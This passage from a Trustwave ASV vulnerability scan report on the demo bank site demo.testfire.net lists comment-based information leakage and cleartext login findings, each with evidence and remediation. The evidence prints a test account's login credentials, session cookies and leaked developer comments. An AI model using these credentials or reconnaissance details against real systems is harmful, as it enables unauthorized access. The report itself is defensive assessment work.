<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST https://demo.testfire.net:8443/sendFeedback HTTP/1.1
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 389 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

106 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net/


HTML or JavaScript Port: tcp/443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 390 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
GET - https://demo.testfire.net/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET https://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

107 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net/index.jsp


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 391 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://demo.testfire.net/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 392 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
affect the security posture of the application.

108 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117:8443/disclaimer.htm?url=http://www.net


HTML or JavaScript scape.com
comments Port: tcp/8443

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://65.61.137.117:8443/disclaimer.htm?url=http://www.netscape.c
om
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET
https://65.61.137.117:8443/disclaimer.htm?url=http://www.netscape.c

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 393 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

109 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117/disclaimer.htm?url=http://www.netscape


HTML or JavaScript .com
comments Port: tcp/443

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 394 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://65.61.137.117/disclaimer.htm?url=http://www.netscape.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
https://65.61.137.117/disclaimer.htm?url=http://www.netscape.com
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

110 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117/login.jsp


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 395 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

7 HTML Comment(s) found


<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Request: GET http://65.61.137.117/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 396 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

111 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117/doLogin


HTML or JavaScript Port: tcp/443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://65.61.137.117/doLogin
Potentially sensitive comments found

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 397 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

7 HTML Comment(s) found


<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Request: POST https://65.61.137.117/doLogin HTTP/1.1
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

112 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net:8443/disclaimer.htm?url=http://www.


netscape.com

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 398 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

HTML or JavaScript Port: tcp/8443


comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://demo.testfire.net:8443/disclaimer.htm?url=http://www.netscape
.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET
https://demo.testfire.net:8443/disclaimer.htm?url=http://www.netscape
.com HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 399 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

113 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net:8443/index.jsp?content=inside_conta


HTML or JavaScript ct.htm
comments Port: tcp/8443

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/index.jsp?content=inside_contact.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 400 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
https://demo.testfire.net:8443/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

114 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net/index.jsp


HTML or JavaScript Port: tcp/443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 401 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
An attacker who finds these comments can map the application's
structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET https://demo.testfire.net/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3

Remediation:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 402 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

115 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net/search.jsp?query=_WSETESTDATA


HTML or JavaScript Port: tcp/443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 403 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET
https://demo.testfire.net/search.jsp?query=_WSETESTDATA HTTP/1.1
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

116 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net/feedback.jsp


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 404 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET http://demo.testfire.net/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 405 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

117 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117/disclaimer.htm?url=http://www.netscape.


HTML or JavaScript com
comments Port: tcp/80

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://65.61.137.117/disclaimer.htm?url=http://www.netscape.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
http://65.61.137.117/disclaimer.htm?url=http://www.netscape.com
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 406 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

118 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117/doLogin


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://65.61.137.117/doLogin

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 407 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

7 HTML Comment(s) found


<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Request: POST http://65.61.137.117/doLogin HTTP/1.1
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 408 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

119 Web Page Transmits Login 4.6 Medium Fail URL: http://65.61.137.117/login.jsp
Credentials Without Port: tcp/80
Encryption
There is a web page on this host that transmits login credentials over
HTTP, which is a clear-text protocol. As such, if an attacker was able to
intercept traffic containing login credentials, it would be trivial to view
user account and password information.

CVSSv2: AV:A/AC:H/Au:N/C:C/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
Form Name: login
Action: http://65.61.137.117:80/doLogin
Fields: uid (text), passw (password), btnSubmit (submit)
Location: http://65.61.137.117/login.jsp

Remediation:
All web application communications containing sensitive information
should be transmitted using SSL/TLS (HTTPS). If re-direction from HTTP
to HTTPS is utilized in an attempt to remediate this finding, please
ensure that such redirection occurs on the server side of the system
(for example via the use of the HTTP "Location" header element) and
that redirection is not reliant upon the client (browser) side.

120 Web Page Transmits Login 4.6 Medium Fail URL: http://demo.testfire.net:8080/login.jsp
Credentials Without Port: tcp/8080
Encryption
There is a web page on this host that transmits login credentials over

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 409 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
HTTP, which is a clear-text protocol. As such, if an attacker was able to
intercept traffic containing login credentials, it would be trivial to view
user account and password information.

CVSSv2: AV:A/AC:H/Au:N/C:C/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
Form Name: login
Action: http://demo.testfire.net:8080/doLogin
Fields: uid (text), passw (password), btnSubmit (submit)
Location: http://demo.testfire.net:8080/login.jsp

Remediation:
All web application communications containing sensitive information
should be transmitted using SSL/TLS (HTTPS). If re-direction from HTTP
to HTTPS is utilized in an attempt to remediate this finding, please
ensure that such redirection occurs on the server side of the system
(for example via the use of the HTTP "Location" header element) and
that redirection is not reliant upon the client (browser) side.

121 Web Page Transmits Login 4.6 Medium Fail URL: http://65.61.137.117:8080/login.jsp
Credentials Without Port: tcp/8080
Encryption
There is a web page on this host that transmits login credentials over
HTTP, which is a clear-text protocol. As such, if an attacker was able to
intercept traffic containing login credentials, it would be trivial to view
user account and password information.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 410 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:A/AC:H/Au:N/C:C/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
Form Name: login
Action: http://65.61.137.117:8080/doLogin
Fields: uid (text), passw (password), btnSubmit (submit)
Location: http://65.61.137.117:8080/login.jsp

Remediation:
All web application communications containing sensitive information
should be transmitted using SSL/TLS (HTTPS). If re-direction from HTTP
to HTTPS is utilized in an attempt to remediate this finding, please
ensure that such redirection occurs on the server side of the system
(for example via the use of the HTTP "Location" header element) and
that redirection is not reliant upon the client (browser) side.

122 Web Page Transmits Login 4.6 Medium Fail URL: http://demo.testfire.net/login.jsp
Credentials Without Port: tcp/80
Encryption
There is a web page on this host that transmits login credentials over
HTTP, which is a clear-text protocol. As such, if an attacker was able to
intercept traffic containing login credentials, it would be trivial to view
user account and password information.

CVSSv2: AV:A/AC:H/Au:N/C:C/I:N/A:N
Service: http
Application: apache:tomcat

